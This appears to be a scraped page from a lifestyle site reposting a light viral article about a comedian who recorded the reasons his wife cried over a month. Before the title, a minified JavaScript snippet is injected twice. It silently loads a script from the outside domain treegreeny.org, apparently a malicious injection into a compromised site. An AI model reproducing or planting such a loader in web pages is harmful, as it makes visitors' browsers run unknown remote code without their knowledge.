;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); His Wife Cried Almost Every Day. Then, He Started Writing Down The Reasons… – El Hombre – Not only for men

His Wife Cried Almost Every Day. Then, He Started Writing Down The Reasons…

There is absolutely no shame in getting a little emotional every now and then. I am the first to admit that I can be pretty quick to tears when, for example, my brother sends me a new photo of my nephew. He’s just getting so big, you guys!

But Aaron Gillies‘ wife totally tops my tear ducts. So much so, in fact, that the London-based comedian decided to create a record of his wife Lex’s super-weepy ways. Over the course of a month, he wrote down all the things that set her eye faucets off.

To be fair, these all sound totally legit to me…

It’s okay, Lex, you’re not alone!

Others chimed in with more totally valid reasons for bursting into tears, too:

(source Reddit, Twitter)

Thank goodness we crybabies have each other for support. Otherwise we’d probably cry even more. Here’s hoping Gillies’ follows up with another list next month!

Read more: http://www.viralnova.com/reasons-wife-crying/